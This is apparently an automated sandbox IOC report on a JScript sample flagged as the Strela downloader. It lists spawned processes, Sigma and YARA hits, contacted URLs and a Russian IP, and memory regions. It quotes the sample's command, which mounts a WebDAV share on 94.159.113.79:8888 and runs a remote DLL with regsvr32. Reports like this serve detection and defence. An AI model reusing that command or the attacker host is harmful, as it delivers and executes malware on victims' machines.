Automated Malware Analysis IOC Report for

Processes

Path

Cmdline

Malicious

C:\Windows\System32\wscript.exe

C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6042109671038401.js"

Details

Is windows:	true
Is dropped:	false
PID:	5288
Target ID:	0
Parent PID:	2580
Name:	wscript.exe
Class:	wscript
Path:	C:\Windows\System32\wscript.exe
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6042109671038401.js"
Size:	170496
MD5:	A47CBE969EA935BDD3AB568BB126BC80
Time:	19:57:34
Date:	21/11/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff798330000
Modulesize:	184320
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Yara detected Strela Downloader	Spam, unwanted Advertisements and Ransom Demands
Sigma detected: WScript or CScript Dropper	System Summary
Sigma detected: Cscript/Wscript Potentially Suspicious Child Process	System Summary
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c net use \\94.159.113.79@8888\davwwwroot\ && regsvr32 /s \\94.159.113.79@8888\davwwwroot\18238315982036.dll

Details

Is windows:	true
Is dropped:	false
PID:	600
Target ID:	1
Parent PID:	5288
Name:	cmd.exe
Class:	cmd
Path:	C:\Windows\System32\cmd.exe
Commandline:	"C:\Windows\System32\cmd.exe" /c net use \\94.159.113.79@8888\davwwwroot\ && regsvr32 /s \\94.159.113.79@8888\davwwwroot\18238315982036.dll
Size:	289792
MD5:	8A2122E8162DBEF04694B9C3E0B6CDEE
Time:	19:57:34
Date:	21/11/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff62eca0000
Modulesize:	421888
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Gathers information about network shares	Stealing of Sensitive Information	Network Share Discovery
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Cscript/Wscript Potentially Suspicious Child Process	System Summary
Sigma detected: System Network Connections Discovery Via Net.EXE	System Summary
Sigma detected: Windows Share Mount Via Net.EXE	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\net.exe

net use \\94.159.113.79@8888\davwwwroot\

Details

Is windows:	true
Is dropped:	false
PID:	7040
Target ID:	3
Parent PID:	600
Name:	net.exe
Path:	C:\Windows\System32\net.exe
Commandline:	net use \\94.159.113.79@8888\davwwwroot\
Size:	59904
MD5:	0BD94A338EEA5A4E1F2830AE326E6D19
Time:	19:57:34
Date:	21/11/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff62ffb0000
Modulesize:	122880
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Gathers information about network shares	Stealing of Sensitive Information	Network Share Discovery
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Communication To Uncommon Destination Ports	System Summary
Sigma detected: System Network Connections Discovery Via Net.EXE	System Summary
Sigma detected: Windows Share Mount Via Net.EXE	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Details

Is windows:	true
Is dropped:	false
PID:	6040
Target ID:	2
Parent PID:	600
Name:	conhost.exe
Path:	C:\Windows\System32\conhost.exe
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Size:	862208
MD5:	0D698AF330FD17BEE3BF90011D49251D
Time:	19:57:34
Date:	21/11/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff7699e0000
Modulesize:	892928
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Spawns processes	System Summary	Process Injection

URLs

Name

Malicious

http://94.159.113.79:8888/pace

unknown

Details

Name:	http://94.159.113.79:8888/pace
TargetID:	3
From Memory:	true
Current Path:	C:\Windows\System32\net.exe
Source:	net.exe, 00000003.00000002.1709612667.00000188315E0000.00000004.00000020.00020000.00000000.sdmp
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
URLs found in memory or binary data	Networking

http://94.159.113.79:8888/B

unknown

http://94.159.113.79:8888/

unknown

Details

Name:	http://94.159.113.79:8888/
TargetID:	3
From Memory:	true
Current Path:	C:\Windows\System32\net.exe
Source:	net.exe, 00000003.00000002.1709612667.000001883162C000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000002.1709612667.00000188315E0000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000002.1709612667.000001883160C000.00000004.00000020.00020000.00000000.sdmp
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
URLs found in memory or binary data	Networking

http://94.159.113.79:8888/wL

unknown

http://94.159.113.79:8888/Z

unknown

http://94.159.113.79:8888/z

unknown

http://94.159.113.79:8888/f

unknown

IPs

Domain

Country

Malicious

94.159.113.79

unknown

Russian Federation

Details

IP:	94.159.113.79
TargetID:	3
Current Path:	C:\Windows\System32\net.exe
Country:	Russian Federation
Countrycode:	RUS
ASN number:	49531
ASN name:	NETCOM-R-ASRU
Private:	false

Signature Hits	Behavior Group	Mitre Attack
JScript performs obfuscated calls to suspicious functions	Data Obfuscation	Scripting
Gathers information about network shares	Stealing of Sensitive Information	Network Share Discovery
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port
Sigma detected: Communication To Uncommon Destination Ports	System Summary
Sigma detected: Cscript/Wscript Potentially Suspicious Child Process	System Summary
Connects to IPs without corresponding DNS lookups	Networking
Sigma detected: System Network Connections Discovery Via Net.EXE	System Summary
Sigma detected: Windows Share Mount Via Net.EXE	System Summary
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking

Registry

Path

Value

Malicious

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe

JScriptSetScriptStateStarted

Memdumps

Base Address

Regiontype

Protect

Malicious

188315D8000

heap

page read and write

1C5C4FD0000

heap

page read and write

1C5C2F97000

heap

page read and write

1C5C4FDB000

heap

page read and write

18831930000

heap

page read and write

1C5C5004000

heap

page read and write

1C5C4FDC000

heap

page read and write

1C5C4FFB000

heap

page read and write

1C5C500F000

heap

page read and write

1883162C000

heap

page read and write

1C5C4FF9000

heap

page read and write

1C5C4FDD000

heap

page read and write

1C5C5000000

heap

page read and write

1C5C4FEA000

heap

page read and write

1C5C31A5000

heap

page read and write

633B2FF000

stack

page read and write

1C5C4FD4000

heap

page read and write

1C5C500F000

heap

page read and write

1C5C4FE6000

heap

page read and write

188315FD000

heap

page read and write

1C5C4FF6000

heap

page read and write

673BCFE000

stack

page read and write

188315D0000

heap

page read and write

1C5C4FF2000

heap

page read and write

1C5C500F000

heap

page read and write

1C5C5225000

heap

page read and write

1C5C4FD3000

heap

page read and write

18831603000

heap

page read and write

1C5C500F000

heap

page read and write

1C5C500F000

heap

page read and write

1C5C500F000

heap

page read and write

1C5C4FF3000

heap

page read and write

1C5C3100000

heap

page read and write

1C5C500F000

heap

page read and write

633AEFE000

stack

page read and write

1C5C4FDC000

heap

page read and write

633B0FF000

stack

page read and write

1C5C500F000

heap

page read and write

1C5C5409000

heap

page read and write

1C5C5220000

heap

page read and write

1C5C4FF9000

heap

page read and write

1C5C4FF9000

heap

page read and write

1C5C4FFC000

heap

page read and write

18831580000

remote allocation

page read and write

188315E0000

heap

page read and write

1C5C4FEE000

heap

page read and write

1C5C500F000

heap

page read and write

1C5C500F000

heap

page read and write

1C5C500F000

heap

page read and write

1C5C500F000

heap

page read and write

1C5C5014000

heap

page read and write

673BAFF000

stack

page read and write

1C5C4FDF000

heap

page read and write

1C5C4FE3000

heap

page read and write

1C5C4FD6000

heap

page read and write

673BA7A000

stack

page read and write

1C5C500F000

heap

page read and write

633ACFA000

stack

page read and write

1C5C50D7000

heap

page read and write

1C5C500F000

heap

page read and write

1C5C5018000

heap

page read and write

1C5C4FF9000

heap

page read and write

18831500000

heap

page read and write

633B6FB000

stack

page read and write

1C5C500F000

heap

page read and write

633B1FF000

stack

page read and write

18831935000

heap

page read and write

1C5C500F000

heap

page read and write

673BB7E000

stack

page read and write

1C5C4FE1000

heap

page read and write

1C5C31A0000

heap

page read and write

1C5C500F000

heap

page read and write

1C5C4FEF000

heap

page read and write

1C5C4FE4000

heap

page read and write

18831510000

heap

page read and write

1C5C4B30000

heap

page read and write

673BC7E000

stack

page read and write

18831530000

heap

page read and write

1C5C50D6000

heap

page read and write

1C5C4FF9000

heap

page read and write

1C5C500C000

heap

page read and write

18831580000

remote allocation

page read and write

673BBFC000

stack

page read and write

1C5C4FF7000

heap

page read and write

1C5C4FD1000

heap

page read and write

1C5C4FEB000

heap

page read and write

1883160C000

heap

page read and write

1C5C5004000

heap

page read and write

18831580000

remote allocation

page read and write

1C5C4E8D000

heap

page read and write

1C5C2F20000

heap

page read and write

633ADFE000

stack

page read and write

1C5C4FD3000

heap

page read and write

1C5C3120000

heap

page read and write

1C5C500F000

heap

page read and write

18831604000

heap

page read and write

18831626000

heap

page read and write

1C5C500F000

heap

page read and write

1C5C4FE4000

heap

page read and write

1C5C4FD8000

heap

page read and write

18831640000

heap

page read and write

1883160D000

heap

page read and write

1C5C3020000

heap

page read and write

18831639000

heap

page read and write

1C5C4FE7000

heap

page read and write

633B3FE000

stack

page read and write

1C5C4FD4000

heap

page read and write

633B4FE000

stack

page read and write

1C5C4FD9000

heap

page read and write

There are 99 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
6042109671038401.js

Processes

URLs

IPs

Registry

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report6042109671038401.js

Processes

URLs

IPs

Registry

Memdumps

IOC Report
6042109671038401.js